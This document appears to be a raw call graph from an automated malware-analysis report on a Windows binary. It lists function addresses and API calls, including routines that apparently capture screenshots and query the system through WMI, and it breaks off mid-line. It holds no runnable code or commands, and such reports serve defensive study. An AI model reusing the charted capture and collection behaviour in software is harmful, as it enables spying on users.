12796->12797 12797->12689 12799 445f509 12798->12799 12799->12689 12800->12793 12801->12692 12803 445a2f8 12802->12803 12804 445a31d 12803->12804 12805 4458ddf 2 API calls 12803->12805 12806 445a333 12803->12806 12807 4458f63 memset 12804->12807 12805->12804 12806->12695 12807->12806 12808->12697 12809->12718 12810->12721 12812 44574dd 12811->12812 12813 445f0d9 8 API calls 12812->12813 12814 44574ef 12813->12814 12814->12719 12816 445cb2f 12815->12816 12817 445cb4e 12816->12817 12818 4459f85 2 API calls 12816->12818 12817->12726 12819 445cb5d lstrcmpiW 12818->12819 12820 445cb73 12819->12820 12821 4458d9a 2 API calls 12820->12821 12821->12817 12822->12732 12831 445cd08 12823->12831 12826 445cc72 12827 4459f85 2 API calls 12826->12827 12830 445cc98 12827->12830 12828 4458d9a 2 API calls 12829 445373c 12828->12829 12829->12738 12830->12828 12832 4458f63 memset 12831->12832 12834 445cd3f 12832->12834 12833 445cdf9 LocalAlloc 12835 44536ee 12833->12835 12834->12833 12834->12835 12835->12739 12835->12826 12837 4452e0a 12836->12837 12838 4452df3 12836->12838 12837->12745 12839 4458e5d 3 API calls 12838->12839 12839->12837 12847 445ab55 12840->12847 12848 445acb3 4 API calls 12847->12848 12849 4452eef 12848->12849 12849->12749 12849->12756 12969->11453 12970->11455 14130 4451295 14131 445aab0 4 API calls 14130->14131 14132 44512ac 14131->14132 14133 44512d1 14132->14133 14134 44636d5 2 API calls 14132->14134 14168 445117d 14133->14168 14134->14133 14137 4451306 14138 445ab83 4 API calls 14139 4451316 14138->14139 14167 44513d4 14139->14167 14175 4457c67 14139->14175 14140 445b305 4 API calls 14143 44513eb 14140->14143 14145 445b3f2 5 API calls 14143->14145 14144 445133d 14154 4458ddf 2 API calls 14144->14154 14147 44513f7 14145->14147 14146 4451371 14150 445b305 4 API calls 14146->14150 14363 4457aa7 14147->14363 14148 445ab83 4 API calls 14151 4451368 14148->14151 14153 445138d 14150->14153 14151->14146 14190 4456991 14151->14190 14341 445b3f2 14153->14341 14154->14137 14155 445142c 14392 445110a 14155->14392 14156 445143e 14156->14144 14162 445110a 8 API calls 14156->14162 14163 4451438 14162->14163 14402 44510ba 14163->14402 14167->14140 14169 4459f6b 2 API calls 14168->14169 14170 445118e 14169->14170 14171 4459bfd 2 API calls 14170->14171 14172 44511aa 14171->14172 14173 4458d87 2 API calls 14172->14173 14174 44511b7 14173->14174 14174->14137 14174->14138 14410 4457eb5 14175->14410 14177 4457c84 14189 4451334 14177->14189 14421 44576f8 14177->14421 14179 4457cb5 14181 4458ddf 2 API calls 14179->14181 14180 4457cae 14180->14179 14438 4457692 14180->14438 14182 4457cf0 14181->14182 14184 4458ddf 2 API calls 14182->14184 14186 4457cfb 14184->14186 14188 4458ddf 2 API calls 14186->14188 14188->14189 14189->14144 14189->14146 14189->14148 14696 4458dc9 RtlAllocateHeap 14190->14696 14192 44569a7 14193 445aaff 4 API calls 14192->14193 14293 4456ea0 14192->14293 14194 44569bc 14193->14194 14697 445fd3d 14194->14697 14199 4459ab3 RtlAllocateHeap 14200 44569e0 14199->14200 14201 4459ab3 RtlAllocateHeap 14200->14201 14202 44569f4 14201->14202 14203 4456a19 14202->14203 14204 4459ab3 RtlAllocateHeap 14202->14204 14205 4459ab3 RtlAllocateHeap 14203->14205 14204->14203 14206 4456a3e 14205->14206 14723 445e849 14206->14723 14212 4456aac 14213 4456ab3 14212->14213 14770 4458dc9 RtlAllocateHeap 14212->14770 14216 445109a 2 API calls 14213->14216 14215 4456ac1 14215->14213 14218 445bb95 memset 14215->14218 14217 4456b02 14216->14217 14771 445b83a 14217->14771 14218->14213 14221 4458d9a 2 API calls 14222 4456b1c 14221->14222 14223 445109a 2 API calls 14222->14223 14224 4456b28 14223->14224 14225 445b83a 5 API calls 14224->14225 14226 4456b33 14225->14226 14227 4458d9a 2 API calls 14226->14227 14228 4456b42 14227->14228 14229 445109a 2 API calls 14228->14229 14230 4456b4a 14229->14230 14231 445b83a 5 API calls 14230->14231 14232 4456b55 14231->14232 14233 4458d9a 2 API calls 14232->14233 14234 4456b64 14233->14234 14235 445109a 2 API calls 14234->14235 14236 4456b70 14235->14236 14237 445b83a 5 API calls 14236->14237 14238 4456b7b 14237->14238 14239 4458d9a 2 API calls 14238->14239 14240 4456b8a 14239->14240 14241 4456bdc 14240->14241 14242 445109a 2 API calls 14240->14242 14243 445109a 2 API calls 14241->14243 14244 4456ba3 14242->14244 14245 4456bec 14243->14245 14246 4459fe4 2 API calls 14244->14246 14247 445b83a 5 API calls 14245->14247 14248 4456bc5 14246->14248 14249 4456bf7 14247->14249 14250 4458d9a 2 API calls 14248->14250 14251 4458d9a 2 API calls 14249->14251 14253 4456bce 14250->14253 14252 4456c06 14251->14252 14254 445109a 2 API calls 14252->14254 14255 445b83a 5 API calls 14253->14255 14256 4456c12 14254->14256 14255->14241 14257 445b83a 5 API calls 14256->14257 14258 4456c1d 14257->14258 14259 4458d9a 2 API calls 14258->14259 14260 4456c2c 14259->14260 14261 445109a 2 API calls 14260->14261 14262 4456c34 14261->14262 14263 445b83a 5 API calls 14262->14263 14264 4456c3f 14263->14264 14265 4458d9a 2 API calls 14264->14265 14266 4456c4e 14265->14266 14267 445109a 2 API calls 14266->14267 14268 4456c5a 14267->14268 14269 445b83a 5 API calls 14268->14269 14270 4456c65 14269->14270 14271 4458d9a 2 API calls 14270->14271 14272 4456c74 14271->14272 14273 445109a 2 API calls 14272->14273 14274 4456c80 14273->14274 14275 445b83a 5 API calls 14274->14275 14276 4456c8b 14275->14276 14277 4458d9a 2 API calls 14276->14277 14278 4456c9a 14277->14278 14279 445109a 2 API calls 14278->14279 14280 4456ca6 14279->14280 14281 445b83a 5 API calls 14280->14281 14282 4456cb1 14281->14282 14283 4458d9a 2 API calls 14282->14283 14284 4456cc0 14283->14284 14285 445109a 2 API calls 14284->14285 14286 4456ccc 14285->14286 14287 445b83a 5 API calls 14286->14287 14288 4456cd7 14287->14288 14293->14146 14342 445aab0 4 API calls 14341->14342 14343 445b404 14342->14343 14344 445a1f8 GetSystemTimeAsFileTime 14343->14344 14345 4451399 14344->14345 14346 4457d0f 14345->14346 14874 4460522 14346->14874 14348 4457d2f 14877 4458146 14348->14877 15048 4459905 14363->15048 14366 4460522 GetTickCount 14367 4457aee 14366->14367 15054 4457f12 14367->15054 14369 4457b0e 14370 44576f8 19 API calls 14369->14370 14379 4451420 14369->14379 14371 4457b3e 14370->14371 14375 4457692 8 API calls 14371->14375 14391 4457b45 14371->14391 14372 4458ddf 2 API calls 14373 4457c47 14372->14373 14374 4458ddf 2 API calls 14373->14374 14376 4457c52 14374->14376 14378 4457b6f 14375->14378 14377 4458ddf 2 API calls 14376->14377 14377->14379 14378->14391 15093 445793f 14378->15093 14379->14155 14379->14156 14381 4457b9a 14381->14391 15106 445780f 14381->15106 14384 445110a 8 API calls 14385 4457bda 14384->14385 14386 4457be6 14385->14386 14387 4458f63 memset 14385->14387 15120 44577be 14386->15120 14388 4457bfb 14387->14388 14390 4451d97 6 API calls 14388->14390 14390->14386 14391->14372 14393 4451120 14392->14393 14394 445a06e memset 14393->14394 14395 4451174 14393->14395 14396 4451146 14394->14396 14395->14163 14397 445a1f8 GetSystemTimeAsFileTime 14396->14397 14398 445115b 14397->14398 14399 445ac24 6 API calls 14398->14399 14400 4451169 14399->14400 14401 445abf8 6 API calls 14400->14401 14401->14395 14403 44510c6 14402->14403 14404 44510da 14402->14404 14405 445aaff 4 API calls 14403->14405 14406 445aaff 4 API calls 14404->14406 14407 44510cd 14405->14407 14406->14407 14408 4459fa5 2 API calls 14407->14408 14409 44510fd 14408->14409 14409->14144 14450 44611b3 14410->14450 14412 4457ebe 14454 4458927 14412->14454 14414 4457ed1 14415 4458927 strncpy 14414->14415 14416 4457ee5 14415->14416 14417 4458927 strncpy 14416->14417 14418 4457ef9 14417->14418 14458 4461c34 14418->14458 14420 4457f01 14420->14177 14550 44575e1 14421->14550 14424 445779f 14424->14180 14425 445bf56 RtlAllocateHeap 14426 4457732 14425->14426 14427 4457767 14426->14427 14561 44574fe 14426->14561 14428 4458ddf 2 API calls 14427->14428 14430 445777f 14428->14430 14431 4458ddf 2 API calls 14430->14431 14432 445778a 14431->14432 14434 4458ddf 2 API calls 14432->14434 14433 4457740 14433->14427 14569 445faaf 14433->14569 14436 4457795 14434->14436 14436->14424 14437 4458ddf 2 API calls 14436->14437 14437->14424 14439 445bfc8 2 API calls 14438->14439 14440 44576aa 14439->14440 14441 44576e6 14440->14441 14442 445755a 5 API calls 14440->14442 14447 44578c5 14441->14447 14443 44576c9 14442->14443 14444 4460485 lstrlenW 14443->14444 14445 44576dd 14444->14445 14446 4458ecb lstrlenW 14445->14446 14446->14441 14637 4461d21 14447->14637 14449 44578de 14449->14179 14451 44611bb 14450->14451 14453 44611c2 14451->14453 14463 44628ef 14451->14463 14453->14412 14455 4458938 14454->14455 14456 445893d 14454->14456 14455->14414 14481 4461293 14456->14481 14459 4461c43 14458->14459 14460 4461c48 14459->14460 14493 4461bd8 14459->14493 14460->14420 14462 4461c61 14462->14420 14464 4462931 14463->14464 14465 44628fe 14463->14465 14464->14453 14466 4462922 SwitchToThread 14465->14466 14467 446290f 14465->14467 14466->14464 14466->14466 14468 4462918 14467->14468 14470 44628c9 14467->14470 14468->14453 14475 4462951 GetModuleHandleW 14470->14475 14472 44628d6 14474 44628e4 14472->14474 14480 4462933 _time64 GetCurrentProcessId 14472->14480 14474->14468 14476 446296f GetProcAddress 14475->14476 14479 44629a0 14475->14479 14477 4462983 GetProcAddress 14476->14477 14476->14479 14478 4462992 GetProcAddress 14477->14478 14477->14479 14478->14479 14479->14472 14480->14474 14482 446129e 14481->14482 14484 44612c5 14481->14484 14482->14484 14485 44612d9 14482->14485 14484->14455 14486 4461307 14485->14486 14487 44612e4 14485->14487 14486->14484 14487->14486 14489 4462edb 14487->14489 14490 4462ef3 14489->14490 14491 4462f7a strncpy 14490->14491 14492 4462f46 14490->14492 14491->14492 14492->14486 14494 4461beb 14493->14494 14496 4461c07 14494->14496 14497 44614c5 14494->14497 14496->14462 14498 44614f3 14497->14498 14508 4461505 14497->14508 14499 44616c3 14498->14499 14500 44615b0 14498->14500 14501 446152f 14498->14501 14502 446155f 14498->14502 14507 446158f 14498->14507 14498->14508 14505 4461c8e 2 API calls 14499->14505 14538 4461c8e _snprintf 14500->14538 14504 4461535 _snprintf 14501->14504 14521 44633da 14502->14521 14504->14508 14510 44616f2 14505->14510 14533 4461a0a 14507->14533 14508->14496 14510->14508 14512 4461774 14510->14512 14518 44618aa 14510->14518 14511 44614c5 11 API calls 14514 44615bf 14511->14514 14512->14508 14515 44617b5 qsort 14512->14515 14513 4461a0a 2 API calls 14513->14518 14514->14508 14514->14511 14515->14508 14520 44617de 14515->14520 14516 44614c5 11 API calls 14516->14518 14517 4461a0a 2 API calls 14517->14520 14518->14508 14518->14513 14518->14516 14519 44614c5 11 API calls 14519->14520 14520->14508 14520->14517 14520->14519 14522 44633e7 _snprintf 14521->14522 14523 44633e4 14521->14523 14524 4463487 14522->14524 14525 4463410 14522->14525 14523->14522 14524->14508 14525->14524 14543 44633b3 localeconv 14525->14543 14528 446344e strchr 14528->14524 14531 4463461 14528->14531 14529 446342a strchr 14529->14528 14530 4463438 14529->14530 14530->14524 14530->14528 14531->14524 14546 4458ecb 14531->14546 14535 4461a20 14533->14535 14534 4461ba8 14534->14508 14535->14534 14536 4461b23 _snprintf 14535->14536 14537 4461b3a _snprintf 14535->14537 14536->14535 14537->14535 14540 4461caf 14538->14540 14539 4461cb6 14539->14514 14540->14539 14541 4462edb strncpy 14540->14541 14542 4461ccc 14541->14542 14542->14514 14544 44633c3 strchr 14543->14544 14545 44633d5 strchr 14543->14545 14544->14545 14545->14528 14545->14529 14547 4458ef7 lstrlenW 14546->14547 14549 4458f2b 14547->14549 14549->14524 14549->14549 14573 4458dc9 RtlAllocateHeap 14550->14573 14552 44575fb 14553 446357b 2 API calls 14552->14553 14560 445767c 14552->14560 14554 445761f 14553->14554 14574 445755a 14554->14574 14556 4457634 14557 4460485 lstrlenW 14556->14557 14558 4457667 14557->14558 14559 4458f63 memset 14558->14559 14559->14560 14560->14424 14560->14425 14562 445750f 14561->14562 14563 44598d0 2 API calls 14562->14563 14564 445752b 14563->14564 14583 4458dc9 RtlAllocateHeap 14564->14583 14566 4457536 14567 4457550 14566->14567 14568 4459fa5 2 API calls 14566->14568 14567->14433 14568->14567 14571 445fac3 14569->14571 14572 445fb09 14571->14572 14584 445fb10 14571->14584 14572->14427 14573->14552 14575 4457573 14574->14575 14576 4451080 2 API calls 14575->14576 14577 4457580 lstrcpynA 14576->14577 14578 445759e 14577->14578 14579 4458d87 2 API calls 14578->14579 14580 44575a8 14579->14580 14581 4458f63 memset 14580->14581 14582 44575cd 14581->14582 14582->14556 14583->14566 14589 445f7a3 memset memset 14584->14589 14586 445fb3c 14587 445fb5f 14586->14587 14615 445f5a1 14586->14615 14587->14571 14590 4459f6b 2 API calls 14589->14590 14591 445f7f5 14590->14591 14592 4459f6b 2 API calls 14591->14592 14593 445f802 14592->14593 14594 4459f6b 2 API calls 14593->14594 14595 445f80f 14594->14595 14596 4459f6b 2 API calls 14595->14596 14597 445f81c 14596->14597 14598 4459f6b 2 API calls 14597->14598 14599 445f829 14598->14599 14600 4458f63 memset 14599->14600 14613 445f83d 14600->14613 14601 445f8ba GetLastError 14601->14613 14602 445fa0d 14603 4458f63 memset 14602->14603 14608 445f887 14602->14608 14604 445fa2f 14603->14604 14607 445fa4b GetLastError 14604->14607 14604->14608 14605 445a1f8 GetSystemTimeAsFileTime 14605->14613 14606 445f8fb GetLastError 14606->14613 14607->14608 14608->14586 14609 445f953 GetLastError 14609->14613 14611 4459f6b 2 API calls 14611->14613 14612 4458d87 2 API calls 14612->14613 14613->14601 14613->14602 14613->14605 14613->14606 14613->14608 14613->14609 14613->14611 14613->14612 14614 445f9cd GetLastError 14613->14614 14631 445f6e9 14613->14631 14614->14613 14616 445f5be 14615->14616 14635 4458dc9 RtlAllocateHeap 14616->14635 14618 445f5d3 14620 445f5dc 14618->14620 14636 4458dc9 RtlAllocateHeap 14618->14636 14621 445f6af 14620->14621 14622 4458ddf 2 API calls 14620->14622 14623 445f6c7 14621->14623 14624 4458ddf 2 API calls 14621->14624 14622->14621 14623->14587 14624->14623 14625 445f689 GetLastError 14625->14620 14626 445f695 14625->14626 14628 445a1f8 GetSystemTimeAsFileTime 14626->14628 14627 445a1f8 GetSystemTimeAsFileTime 14629 445f5ec 14627->14629 14628->14620 14629->14620 14629->14621 14629->14625 14629->14627 14630 4458e5d 3 API calls 14629->14630 14630->14629 14632 445f70b 14631->14632 14633 445f730 GetLastError 14632->14633 14634 445f72b 14632->14634 14633->14634 14634->14613 14635->14618 14636->14629 14638 4461d74 14637->14638 14639 4461d2e 14637->14639 14638->14449 14639->14638 14642 446246c 14639->14642 14641 4461d61 14641->14449 14649 4461e6f 14642->14649 14644 4462483 14647 44624aa 14644->14647 14653 44625e0 14644->14653 14646 44624a1 14646->14647 14648 4461e6f 8 API calls 14646->14648 14647->14641 14648->14647 14650 4461e81 14649->14650 14652 4461eba 14650->14652 14663 446200e 14650->14663 14652->14644 14654 44625f7 14653->14654 14655 4462641 14653->14655 14654->14655 14656 4462667 14654->14656 14657 4462613 14654->14657 14655->14646 14689 44623ec 14656->14689 14659 4462656 14657->14659 14660 4462618 14657->14660 14679 44624dd 14659->14679 14660->14655 14662 4462629 memchr 14660->14662 14662->14655 14664 4462028 14663->14664 14665 446204d 14664->14665 14666 44620e2 14664->14666 14667 4462097 14664->14667 14665->14652 14666->14665 14670 446349a 14666->14670 14669 44620a7 _errno _strtoi64 _errno 14667->14669 14669->14665 14676 44634fe localeconv 14670->14676 14673 44634d2 14674 44634e1 _errno 14673->14674 14675 44634ed 14673->14675 14674->14675 14675->14665 14677 44634a9 _errno strtod 14676->14677 14678 446350e strchr 14676->14678 14677->14673 14677->14674 14678->14677 14680 44611b3 7 API calls 14679->14680 14681 44624e9 14680->14681 14682 4461e6f 8 API calls 14681->14682 14688 446250b 14681->14688 14686 44624ff 14682->14686 14683 4462528 memchr 14683->14686 14683->14688 14684 44625e0 17 API calls 14684->14686 14685 44612d9 strncpy 14685->14686 14686->14683 14686->14684 14686->14685 14687 4461e6f 8 API calls 14686->14687 14686->14688 14687->14686 14688->14655 14690 44623f5 14689->14690 14691 4461e6f 8 API calls 14690->14691 14692 4462410 14690->14692 14694 4462408 14691->14694 14692->14655 14693 44625e0 18 API calls 14693->14694 14694->14692 14694->14693 14695 4461e6f 8 API calls 14694->14695 14695->14694 14696->14192 14698 4459fa5 2 API calls 14697->14698 14699 44569c7 14698->14699 14700 445e795 14699->14700 14701 4459f85 2 API calls 14700->14701 14702 445e7aa 14701->14702 14845 445e485 CoInitializeEx CoInitializeSecurity CoCreateInstance 14702->14845 14705 4458d9a 2 API calls 14706 445e7c2 14705->14706 14707 4459f85 2 API calls 14706->14707 14722 44569cc 14706->14722 14708 445e7d6 14707->14708 14709 4459f85 2 API calls 14708->14709 14710 445e7e7 14709->14710 14852 445e6d9 SysAllocString SysAllocString 14710->14852 14712 445e7f8 14713 445e826 14712->14713 14715 4459ab3 RtlAllocateHeap 14712->14715 14714 4458d9a 2 API calls 14713->14714 14717 445e82f 14714->14717 14716 445e807 VariantClear 14715->14716 14716->14713 14719 4458d9a 2 API calls 14717->14719 14720 445e838 14719->14720 14858 445e539 14720->14858 14722->14199 14724 4459f85 2 API calls 14723->14724 14725 445e85b 14724->14725 14726 445e485 6 API calls 14725->14726 14727 445e865 14726->14727 14728 4458d9a 2 API calls 14727->14728 14729 445e873 14728->14729 14730 4456a80 14729->14730 14731 4459f85 2 API calls 14729->14731 14746 445e8fa 14730->14746 14732 445e887 14731->14732 14733 4459f85 2 API calls 14732->14733 14734 445e898 14733->14734 14735 445e6d9 10 API calls 14734->14735 14736 445e8a9 14735->14736 14737 445e8d7 14736->14737 14739 4459ab3 RtlAllocateHeap 14736->14739 14738 4458d9a 2 API calls 14737->14738 14740 445e8e0 14738->14740 14741 445e8b8 VariantClear 14739->14741 14742 4458d9a 2 API calls 14740->14742 14741->14737 14744 445e8e9 14742->14744 14745 445e539 2 API calls 14744->14745 14745->14730 14747 4459f85 2 API calls 14746->14747 14748 445e90f 14747->14748 14749 445e485 6 API calls 14748->14749 14750 445e919 14749->14750 14751 4458d9a 2 API calls 14750->14751 14752 445e927 14751->14752 14753 4459f85 2 API calls 14752->14753 14768 4456a88 14752->14768 14754 445e93b 14753->14754 14755 4459f85 2 API calls 14754->14755 14756 445e94c 14755->14756 14757 445e6d9 10 API calls 14756->14757 14758 445e95d 14757->14758 14759 445e98b 14758->14759 14760 4459ab3 RtlAllocateHeap 14758->14760 14761 4458d9a 2 API calls 14759->14761 14762 445e96c VariantClear 14760->14762 14763 445e994 14761->14763 14762->14759 14765 4458d9a 2 API calls 14763->14765 14766 445e99d 14765->14766 14767 445e539 2 API calls 14766->14767 14767->14768 14769 4458dc9 RtlAllocateHeap 14768->14769 14769->14212 14770->14215 14772 4458f63 memset 14771->14772 14773 445b87e 14772->14773 14774 4458f63 memset 14773->14774 14775 445b88a 14774->14775 14776 445b9e2 14775->14776 14779 4456b0d 14775->14779 14863 4458dc9 RtlAllocateHeap 14775->14863 14777 4458ddf 2 API calls 14776->14777 14777->14779 14779->14221 14780 4459a76 RtlAllocateHeap 14782 445b8f9 14780->14782 14781 4459bfd 2 API calls 14781->14782 14782->14776 14782->14779 14782->14780 14782->14781 14783 4458ddf 2 API calls 14782->14783 14784 445b9a8 14782->14784 14783->14782 14784->14776 14785 4459b26 2 API calls 14784->14785 14786 445b9cb 14785->14786 14786->14776 14787 445b9d1 14786->14787 14788 4458ddf 2 API calls 14787->14788 14788->14779 14846 445e507 14845->14846 14847 445e4ca SysAllocString 14845->14847 14846->14705 14848 445e4e5 14847->14848 14848->14846 14849 445e4e9 CoSetProxyBlanket 14848->14849 14849->14846 14850 445e500 14849->14850 14862 4458dc9 RtlAllocateHeap 14850->14862 14853 4459f85 2 API calls 14852->14853 14854 445e704 SysAllocString 14853->14854 14855 4458d9a 2 API calls 14854->14855 14857 445e717 SysFreeString SysFreeString SysFreeString 14855->14857 14857->14712 14859 445e544 14858->14859 14860 4458ddf 2 API calls 14859->14860 14861 445e561 14860->14861 14861->14722 14862->14846 14863->14782 14875 4460542 GetTickCount 14874->14875 14876 4460531 __aulldiv 14874->14876 14875->14348 14876->14348 14878 44611b3 7 API calls 14877->14878 14879 4458156 14878->14879 14880 4458927 strncpy 14879->14880 14881 445816f 14880->14881 14882 4458927 strncpy 14881->14882 14883 4458183 14882->14883 14884 4458927 strncpy 14883->14884 14885 4458194 14884->14885 14886 4458927 strncpy 14885->14886 14887 44581a7 14886->14887 14888 4458927 strncpy 14887->14888 14889 44581bd 14888->14889 14890 4458927 strncpy 14889->14890 14891 44581d1 14890->14891 14892 4458927 strncpy 14891->14892 14893 44581ea 14892->14893 14894 4458927 strncpy 14893->14894 14895 44581fe 14894->14895 14896 4458927 strncpy 14895->14896 14897 4458212 14896->14897 14898 4458927 strncpy 14897->14898 14899 4458226 14898->14899 14900 4458927 strncpy 14899->14900 14901 445823c 14900->14901 14902 4458927 strncpy 14901->14902 14903 4458253 14902->14903 15033 4458983 14903->15033 14906 4458927 strncpy 14907 4458266 14906->14907 14908 4458927 strncpy 14907->14908 14909 445827a 14908->14909 14910 4458927 strncpy 14909->14910 14911 445828e 14910->14911 14912 4458983 5 API calls 14911->14912 14913 4458296 14912->14913 14914 4458927 strncpy 14913->14914 14915 44582a1 14914->14915 14916 4458983 5 API calls 14915->14916 14917 44582a9 14916->14917 14918 4458927 strncpy 14917->14918 14919 44582b4 14918->14919 14920 4458983 5 API calls 14919->14920 14921 44582bc 14920->14921 14922 4458927 strncpy 14921->14922 14923 44582c7 14922->14923 14924 4458927 strncpy 14923->14924 14925 44582db 14924->14925 14926 4458983 5 API calls 14925->14926 14927 44582e3 14926->14927 14928 4458927 strncpy 14927->14928 14929 44582ee 14928->14929 14930 4458927 strncpy 14929->14930 14931 4458308 14930->14931 14932 4458983 5 API calls 14931->14932 14933 4458310 14932->14933 14934 4458927 strncpy 14933->14934 14935 445831b 14934->14935 14936 4458927 strncpy 14935->14936 14937 445832f 14936->14937 14938 4458927 strncpy 14937->14938 14939 4458343 14938->14939 14940 4458983 5 API calls 14939->14940 14941 4458357 14940->14941 14942 4458927 strncpy 14941->14942 14943 4458362 14942->14943 14944 4458927 strncpy 14943->14944 14945 4458376 14944->14945 14946 4458927 strncpy 14945->14946 14947 445838a 14946->14947 14948 4458983 5 API calls 14947->14948 14949 4458395 14948->14949 14950 4458927 strncpy 14949->14950 14951 44583a0 14950->14951 14952 4458983 5 API calls 14951->14952 14953 44583ab 14952->14953 14954 4458927 strncpy 14953->14954 14955 44583b6 14954->14955 14956 4458983 5 API calls 14955->14956 14957 44583c1 14956->14957 14958 4458927 strncpy 14957->14958 14959 44583cc 14958->14959 14960 4458983 5 API calls 14959->14960 14961 44583d7 14960->14961 14962 4458927 strncpy 14961->14962 14963 44583e2 14962->14963 14964 4458983 5 API calls 14963->14964 14965 44583ed 14964->14965 14966 4458927 strncpy 14965->14966 14967 44583f8 14966->14967 14968 4458983 5 API calls 14967->14968 14969 4458403 14968->14969 14970 4458927 strncpy 14969->14970 14971 445840e 14970->14971 14972 4458983 5 API calls 14971->14972 14973 4458419 14972->14973 14974 4458927 strncpy 14973->14974 15038 4459b62 15033->15038 15035 445825b 15035->14906 15036 4458996 15036->15035 15037 4458ddf 2 API calls 15036->15037 15037->15035 15039 4459b71 WideCharToMultiByte 15038->15039 15046 4459bc1 15038->15046 15040 4459b8c 15039->15040 15039->15046 15047 4458dc9 RtlAllocateHeap 15040->15047 15042 4459b95 15043 4459b9d WideCharToMultiByte 15042->15043 15042->15046 15044 4459bb6 15043->15044 15043->15046 15045 4458ddf 2 API calls 15044->15045 15045->15046 15046->15036 15047->15042 15049 4459913 15048->15049 15049->15049 15050 44636d5 2 API calls 15049->15050 15051 445995d 15050->15051 15052 4457ae9 15051->15052 15053 44636d5 2 API calls 15051->15053 15052->14366 15053->15051 15055 44611b3 7 API calls 15054->15055 15056 4457f21 15055->15056 15057 4458927 strncpy 15056->15057 15058 4457f37 15057->15058 15059 4458927 strncpy 15058->15059 15060 4457f4c 15059->15060 15061 4458927 strncpy 15060->15061 15062 4457f60 15061->15062 15063 4458927 strncpy 15062->15063 15064 4457f75 15063->15064 15065 4458927 strncpy 15064->15065 15066 4457f86 15065->15066 15067 4458927 strncpy 15066->15067 15068 4457f9f 15067->15068 15069 4458927 strncpy 15068->15069 15070 4457fb5 15069->15070 15071 4458927 strncpy 15070->15071 15072 4457fc6 15071->15072 15073 4458927 strncpy 15072->15073 15074 4457fda 15073->15074 15075 4458927 strncpy 15074->15075 15076 4457fed 15075->15076 15077 4458927 strncpy 15076->15077 15078 4458001 15077->15078 15079 4458927 strncpy 15078->15079 15080 4458020 15079->15080 15081 4458983 5 API calls 15080->15081 15082 4458031 15081->15082 15083 4458927 strncpy 15082->15083 15084 445803c 15083->15084 15085 4458983 5 API calls 15084->15085 15086 445804d 15085->15086 15087 4458927 strncpy 15086->15087 15088 4458058 15087->15088 15089 4458927 strncpy 15088->15089 15090 4458074 15089->15090 15091 4461c34 13 API calls 15090->15091 15092 445807c 15091->15092 15092->14369 15094 4461d21 18 API calls 15093->15094 15095 445795d 15094->15095 15096 445a06e memset 15095->15096 15099 4457969 15095->15099 15097 445799d 15096->15097 15097->15099 15127 4458dc9 RtlAllocateHeap 15097->15127 15099->14381 15100 4457a75 15102 4458ddf 2 API calls 15100->15102 15104 4457a86 15100->15104 15101 4457a21 15101->15099 15101->15100 15103 4459a76 RtlAllocateHeap 15101->15103 15102->15100 15103->15101 15105 4458ddf 2 API calls 15104->15105 15105->15099 15107 4457826 15106->15107 15108 445bfc8 2 API calls 15107->15108 15116 44578b6 15107->15116 15109 4457842 15108->15109 15109->15116 15119 445788e 15109->15119 15128 4458dc9 RtlAllocateHeap 15109->15128 15111 4458ddf 2 API calls 15112 44578ac 15111->15112 15114 4458ddf 2 API calls 15112->15114 15113 445785f 15115 4459fa5 2 API calls 15113->15115 15113->15119 15114->15116 15117 445787e 15115->15117 15116->14384 15116->14391 15129 4458bbb 15117->15129 15119->15111 15145 445808f 15120->15145 15122 44577db 15123 44576f8 19 API calls 15122->15123 15124 44577fb 15123->15124 15125 4458ddf 2 API calls 15124->15125 15126 4457806 15125->15126 15126->14391 15127->15101 15128->15113 15132 4458a4f 15129->15132 15139 44589b9 15132->15139 15134 4458a7c 15134->15119 15135 4458aa8 GetLastError 15138 4458b37 15135->15138 15137 4458ddf 2 API calls 15137->15134 15138->15137 15144 4458dc9 RtlAllocateHeap 15139->15144 15141 4458a2c 15141->15134 15141->15135 15141->15138 15142 44589ca 15142->15141 15142->15142 15143 4458a1b lstrlenW 15142->15143 15143->15141 15144->15142 15146 44611b3 7 API calls 15145->15146 15147 445809e 15146->15147 15148 4458927 strncpy 15147->15148 15149 44580b4 15148->15149 15150 4458927 strncpy 15149->15150 15151 44580c8 15150->15151 15152 4458927 strncpy 15151->15152 15153 44580d9 15152->15153 15154 4458927 strncpy 15153->15154 15155 44580ea 15154->15155 15156 4458927 strncpy 15155->15156 15157 44580ff 15156->15157 15158 4458927 strncpy 15157->15158 15159 4458115 15158->15159 15160 4458927 strncpy 15159->15160 15161 445812b 15160->15161 15162 4461c34 13 API calls 15161->15162 15163 4458133 15162->15163 15163->15122 15164 4455f94 15170 4458dc9 RtlAllocateHeap 15164->15170 15166 4456012 15168 445a1f8 GetSystemTimeAsFileTime 15169 4455fa9 15168->15169 15169->15166 15169->15168 15171 4455d1e GetDC 15169->15171 15170->15169 15172 4455d50 CreateCompatibleDC 15171->15172 15196 4455f3e 15171->15196 15174 4455d61 GetDeviceCaps GetDeviceCaps CreateCompatibleBitmap 15172->15174 15172->15196 15173 4458ddf 2 API calls 15175 4455f5d 15173->15175 15176 4455d8c SelectObject 15174->15176 15174->15196 15177 4458ddf 2 API calls 15175->15177 15178 4455d9f BitBlt GetCursorInfo 15176->15178 15176->15196 15179 4455f68 15177->15179 15180 4455e25 SelectObject 15178->15180 15181 4455dd0 15178->15181 15182 4455f76 15179->15182 15183 4455f6f DeleteDC 15179->15183 15185 4455e39 GetObjectW 15180->15185 15180->15196 15181->15180 15184 4455dd5 CopyIcon GetIconInfo GetObjectW DrawIconEx 15181->15184 15186 4455f81 15182->15186 15187 4455f7a DeleteDC 15182->15187 15183->15182 15184->15180 15197 4458dc9 RtlAllocateHeap 15185->15197 15190 4455f85 DeleteObject 15186->15190 15191 4455f8c 15186->15191 15187->15186 15189 4455ea2 15192 4455eae GetDIBits 15189->15192 15189->15196 15190->15191 15191->15169 15198 4458dc9 RtlAllocateHeap 15192->15198 15194 4455ed4 15195 445fbfb 18 API calls 15194->15195 15194->15196 15195->15196 15196->15173 15197->15189 15198->15194 15220 44557a0 15225 445e565 15220->15225 15223 44557b5 GetLastError 15224 44557be 15223->15224 15250 4458dc9 RtlAllocateHeap 15225->15250 15227 445e57c 15228 44557b1 15227->15228 15229 4459ab3 RtlAllocateHeap 15227->15229 15228->15223 15228->15224 15230 445e591 15229->15230 15230->15228 15251 445a5fe 15230->15251 15233 4459f85 2 API calls 15234 445e5af 15233->15234 15235 4459fe4 2 API calls 15234->15235 15236 445e5c4 15235->15236 15237 4458d9a 2 API calls 15236->15237 15238 445e5cd 15237->15238 15259 445e3b5 15238->15259 15240 445e5d7 15241 445e5de 15240->15241 15266 445e3f9 15240->15266 15243 4458ddf 2 API calls 15241->15243 15244 